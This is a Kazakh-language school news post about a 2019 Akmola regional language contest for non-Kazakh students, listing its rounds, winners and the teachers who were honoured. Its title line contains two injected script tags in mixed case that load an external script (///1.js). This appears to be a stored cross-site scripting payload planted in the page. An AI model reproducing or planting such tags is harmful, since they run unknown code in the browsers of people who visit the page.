Мемлекеттік тіл – менің тілім<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.09.2019

«Облыстық сайыстың  есебі»

 

2019 жылдың 27 қыркүйек күні Көкшетау қаласының оқу- әдістемелі орталығында  «Мемлекеттік тіл – менің тілім» атты өзге  ұлт өкілдері  арасында сайыс өтті. Сайысқа Ақмола облысының аудандарының жеңімпаздары  қатысты. Сайыс төрт кезеңнен тұрды. «Салем берем, сәлем беру салтымыз!» өздерін таныстырды. «Ойдың көркі-  тіл» берілген  тақырыпқа әңгіме айтты. «Сөз мәйегі» поэзия, прозадан үзінді жатқа оқыды. «Ұшқыр қалам» диктант жазды. 1- орынды  Көкшетау қаласы алды. 2- орынды иеленген Біржан сал ауданы. 3- орынға  Атбасар, Зеренді ауданы ие болды.Сайысқа 15 оқушы қатысты. Қатысқан барлық оқушылар грамоталармен  марапатталды. «Мемлекеттік тіл – менің тілім» атты өзге  ұлт өкілдері арасында облыстық  сайыс жеңімпазы №3 орта мектебінен 8 «К» сынып оқушысы Показаньев Артем  қатысып 3 орынды иеленді, электронды кітапша сыйлығы берілді. Пән мұғалімі  Абикенова Қанағат Болатовна «Алғыс хатпен» марапатталды.

 Аудармашы: Бектыбаева А.А., қазақ тіл мұғалімі: Аубакирова Г.М.

Просмотров: 834


Пікір қосу



Деректерді қолтаңбаға қосу